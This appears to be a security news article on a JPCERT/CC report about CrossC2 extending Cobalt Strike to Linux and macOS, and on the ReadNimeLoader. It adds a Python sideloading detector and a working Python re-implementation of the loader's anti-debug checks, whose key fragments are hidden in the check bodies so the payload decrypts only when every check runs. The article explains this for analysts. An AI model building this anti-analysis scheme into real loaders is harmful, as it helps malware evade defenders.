Threat Actors Using CrossC2 Tool to Expand Cobalt Strike to Operate on Linux and macOS


JPCERT/CC has reported a campaign built on CrossC2, an unofficial extension to Cobalt Strike that lets its beacons run on Linux and macOS, taking the framework beyond the Windows hosts it was designed for.

The incidents involving this cross-platform tooling were documented between September and December 2024. That is a notable shift: Cobalt Strike intrusions have traditionally been confined to Windows-based infrastructure.

The attack chain is multi-stage. It starts from a legitimate, signed system binary and only then brings in the malicious components, one stage at a time.


Alongside CrossC2 the attackers used established tooling: PsExec (the Sysinternals remote-execution utility), Plink (PuTTY's command-line SSH client) and standard Cobalt Strike. Together these gave them a toolkit that could move through an Active Directory environment regardless of which operating system a given host ran.

JPCERT/CC observed the campaign in Japan, but submissions to VirusTotal suggest the same tooling has been used in several other countries.

JPCERT/CC analysts identified a custom loader, dubbed "ReadNimeLoader", built specifically to execute Cobalt Strike payloads.

Written in the Nim programming language, the loader carries several anti-analysis techniques and differs markedly from the way Cobalt Strike is usually deployed.

Figure: Flow of Cobalt Strike execution (Source: JPCERT/CC)

The researchers noted that the chain starts with a scheduled task launching a legitimate java.exe, which then loads a malicious DLL through DLL sideloading.
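As an added example (not code from JPCERT/CC or this article), the following Python checks Sysmon-style process-creation (event ID 1) and image-load (event ID 7) records for that chain: java.exe launched by the Task Scheduler host (svchost.exe -s Schedule) from outside a trusted install root, and java.exe loading a DLL from its own directory that is unsigned or sits outside a trusted root. The log lines, paths, process IDs and the DLL name helper.dll are constructed for this example, and the allowlist of trusted Java install roots is an assumption to tune per estate:

```python
import json
import ntpath

# Sysmon-style events serialised as JSON lines (constructed for this example).
SAMPLE_LOG = r"""
{"EventID": 1, "ProcessId": 4120, "Image": "C:\\Users\\Public\\jre\\bin\\java.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "ParentCommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s Schedule"}
{"EventID": 7, "ProcessId": 4120, "Image": "C:\\Users\\Public\\jre\\bin\\java.exe", "ImageLoaded": "C:\\Users\\Public\\jre\\bin\\helper.dll", "Signed": "false"}
{"EventID": 1, "ProcessId": 5000, "Image": "C:\\Program Files\\Java\\jre\\bin\\java.exe", "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\explorer.exe"}
{"EventID": 7, "ProcessId": 5000, "Image": "C:\\Program Files\\Java\\jre\\bin\\java.exe", "ImageLoaded": "C:\\Program Files\\Java\\jre\\bin\\java.dll", "Signed": "true"}
{"EventID": 7, "ProcessId": 5000, "Image": "C:\\Program Files\\Java\\jre\\bin\\java.exe", "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll", "Signed": "true"}
"""

# Where java.exe legitimately lives (assumption: tune to the estate's software inventory).
TRUSTED_JAVA_ROOTS = ("c:\\program files\\java\\", "c:\\program files (x86)\\java\\",
                      "c:\\program files\\eclipse adoptium\\")


def _n(path):
    """Lower-case, backslash-normalised Windows path (ntpath works on any host)."""
    return ntpath.normcase(path or "")


def scheduled_java_start(ev):
    """Event 1: java.exe started by the Task Scheduler host outside a trusted install root."""
    if ev.get("EventID") != 1:
        return None
    image, parent = _n(ev.get("Image")), _n(ev.get("ParentImage"))
    if ntpath.basename(image) != "java.exe" or ntpath.basename(parent) != "svchost.exe":
        return None
    if "-s schedule" not in (ev.get("ParentCommandLine") or "").lower():
        return None
    if image.startswith(TRUSTED_JAVA_ROOTS):
        return None
    return "java.exe launched by Task Scheduler from untrusted path " + ev["Image"]


def sideloaded_dll(ev):
    """Event 7: java.exe loads a DLL from its own directory that is unsigned or
    outside a trusted root (the copied-EXE-plus-attacker-DLL sideloading layout)."""
    if ev.get("EventID") != 7:
        return None
    image, dll = _n(ev.get("Image")), _n(ev.get("ImageLoaded"))
    if ntpath.basename(image) != "java.exe" or not dll.endswith(".dll"):
        return None
    if ntpath.dirname(dll) != ntpath.dirname(image):
        return None  # loaded from System32 or elsewhere: not the sideloading layout
    if image.startswith(TRUSTED_JAVA_ROOTS) and (ev.get("Signed") or "").lower() == "true":
        return None
    return "java.exe loaded %s from its own directory (Signed=%s)" % (ev["ImageLoaded"], ev.get("Signed"))


def detect(events):
    """Apply both rules; a process that matches both is escalated to high severity."""
    alerts = []
    for ev in events:
        for rule in (scheduled_java_start, sideloaded_dll):
            detail = rule(ev)
            if detail:
                alerts.append({"pid": ev.get("ProcessId"), "rule": rule.__name__, "detail": detail})
    rules_per_pid = {}
    for a in alerts:
        rules_per_pid.setdefault(a["pid"], set()).add(a["rule"])
    for a in alerts:
        a["severity"] = "high" if len(rules_per_pid[a["pid"]]) == 2 else "medium"
    return alerts


def load_events(text):
    """Parse JSON-lines export into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_LOG)):
        print(alert["severity"].upper(), alert["pid"], alert["detail"])
```

On the constructed sample, process 4120 trips both rules and is reported as high severity; the properly installed JRE (process 5000) loading its own signed java.dll and kernel32.dll from System32 produces nothing. The second rule deliberately ignores the signature when java.exe runs from an untrusted path, because a copied, still-signed java.exe is exactly what sideloading relies on.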

Advanced Anti-Analysis Mechanisms

ReadNimeLoader carries four distinct anti-debugging checks that complicate analysis.

It reads the BeingDebugged flag in the Process Environment Block (PEB), the same byte IsDebuggerPresent returns; it retrieves the thread's hardware debug registers (GetThreadContext with the CONTEXT_DEBUG_REGISTERS flag) and looks for hardware breakpoints in DR0-DR3; it measures the time elapsed across a stretch of code, which single-stepping or breakpoints inflate; and it raises an exception it expects to handle itself, so that a debugger which consumes the exception leaves the handler unexecuted.

What makes the loader unusual is its key generation: portions of the key needed to decrypt the payload are embedded in the anti-analysis functions themselves.

The loader therefore does not simply abort when it sees a debugger. The correct key is only assembled if every check actually executes, so the usual shortcut of patching the checks out or jumping over them produces a wrong key with no explicit failure, and the payload cannot be recovered by static analysis alone: the checks have to be executed, or faithfully emulated, to obtain it.

The payload is decrypted with AES-256 in ECB mode, the key being built from the loader's string-decoding functions, which recover the embedded fragments. ECB is worth noting for hunters: identical 16-byte plaintext blocks encrypt to identical ciphertext blocks, so repeated structure in the stored payload survives encryption.

Two distinct XOR-based decoding routines handle the obfuscated strings, and later samples add a further routine, decode02, a sign that the loader is still under active development.
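To make the key-embedding design concrete, here is an added Python illustration. It is not JPCERT/CC's code and not ReadNimeLoader itself: the function names, the XOR-encoded fragment values, the timing threshold, the Linux fall-backs (TracerPid for the PEB check) and the stdlib HMAC keystream that stands in for AES-256-ECB are all assumptions of this example. Each of the four anti-debug checks mixes a fragment hidden in its own body into the key, so patching a check out leaves the key incomplete and the stage silently fails to decrypt:

```python
import hashlib
import hmac
import sys
import time

def decode01(data, key):  # single-byte XOR decoder (stand-in for the loader's first decoder)
    return bytes(b ^ key for b in data)

def decode02(data, key):  # rolling multi-byte XOR decoder (stand-in for the later decode02)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

class KeyState:
    """Running key material: each check mixes in its embedded fragment plus its observation."""
    def __init__(self):
        self._h = hashlib.sha256()
    def mix(self, fragment, observation):
        self._h.update(fragment + bytes([observation & 0xFF]))
    def key(self):
        return self._h.digest()  # 32 bytes: AES-256 key size

def check_being_debugged(ks):
    """PEB->BeingDebugged (what IsDebuggerPresent returns); off Windows: TracerPid in /proc."""
    flag = 0
    if sys.platform == "win32":
        import ctypes
        flag = int(ctypes.windll.kernel32.IsDebuggerPresent())
    else:
        try:
            with open("/proc/self/status") as f:
                for line in f:
                    if line.startswith("TracerPid:"):
                        flag = int(line.split()[1] != "0")
        except OSError:
            pass
    ks.mix(decode01(bytes([0x2A, 0x3F, 0x38, 0x7B]), 0x5A), flag)  # key fragment lives here
    return bool(flag)

def check_debug_registers(ks):
    """Hardware breakpoints via GetThreadContext(CONTEXT_DEBUG_REGISTERS), x64 Windows only."""
    flag = 0
    if sys.platform == "win32":
        import ctypes
        k32 = ctypes.windll.kernel32
        raw = ctypes.create_string_buffer(1232 + 16)     # sizeof(CONTEXT) on x64, plus slack
        ctx = (ctypes.addressof(raw) + 15) & ~15         # CONTEXT must be 16-byte aligned
        ctypes.c_uint32.from_address(ctx + 0x30).value = 0x00100010  # ContextFlags = CONTEXT_DEBUG_REGISTERS
        if k32.GetThreadContext(k32.GetCurrentThread(), ctypes.c_void_p(ctx)):
            flag = int(any(ctypes.c_uint64.from_address(ctx + o).value for o in (0x48, 0x50, 0x58, 0x60)))  # Dr0..Dr3
    ks.mix(decode01(bytes([0x3E, 0x28, 0x7B]), 0x5A), flag)  # elsewhere the observation is simply 0
    return bool(flag)

def check_timing(ks):
    """Elapsed-time differential: stepping or breakpoints push fixed work past the (assumed) threshold."""
    t0, acc = time.perf_counter(), 0
    for i in range(50_000):
        acc = (acc * 31 + i) & 0xFFFFFFFF
    flag = int(time.perf_counter() - t0 > 2.0)
    ks.mix(decode02(bytes([0x67, 0x5E, 0x7E, 0x04]), b"\x13\x37"), flag)
    return bool(flag)

def check_exception(ks):
    """Exception-based: a debugger that swallows the exception (int3/SEH natively) leaves handled at 0."""
    handled = 0
    try:
        raise ZeroDivisionError
    except ZeroDivisionError:
        handled = 1
    ks.mix(decode01(bytes([0x3F, 0x22, 0x39]), 0x5A), 1 - handled)
    return handled == 0

CHECKS = {"peb": check_being_debugged, "dr": check_debug_registers,
          "timing": check_timing, "exception": check_exception}

def derive_key(patched=()):
    """Run every check not in `patched` (an analyst who NOP'd a call site) and assemble the key."""
    ks = KeyState()
    for name, fn in CHECKS.items():
        if name not in patched:
            fn(ks)  # verdict ignored: a dirty environment just spoils the key silently
    return ks.key()

def keystream_xor(key, data):
    """Stdlib stand-in for the AES-256-ECB step: XOR with an HMAC-SHA256 counter keystream."""
    out = bytearray()
    for off in range(0, len(data), 32):
        block = hmac.new(key, off.to_bytes(4, "big"), hashlib.sha256).digest()
        out += bytes(b ^ k for b, k in zip(data[off:off + 32], block))
    return bytes(out)

# Packer side: the author knows the fragments and clean observations, so the same derivation
# run offline gives the key the (constructed) stage is encrypted under.
STAGE2 = b"MZ" + b"\x90" * 30 + b"<constructed stand-in for a Cobalt Strike stage>"
ENCRYPTED_STAGE2 = keystream_xor(derive_key(), STAGE2)

def unpack(patched=()):
    """Loader side: derive the key at run time; keep the result only if it looks like a PE."""
    blob = keystream_xor(derive_key(patched), ENCRYPTED_STAGE2)
    return blob if blob.startswith(b"MZ") else None
```

On a clean host unpack() returns the stage. Call unpack(patched=("peb",)) to imitate an analyst who jumped over the PEB check and the same code returns garbage or None, with nothing pointing back at the skipped check. The practical consequence for analysis is to hide the debugger from the checks (or emulate the loader) rather than disable them, since the fragments inside the check bodies are part of the key material.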

Extending Windows-centric tooling to Linux and macOS is a worrying trend. Many Linux servers still run without endpoint detection and response coverage, which gives attackers longer dwell time and more room for lateral movement once they are inside a network.



About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.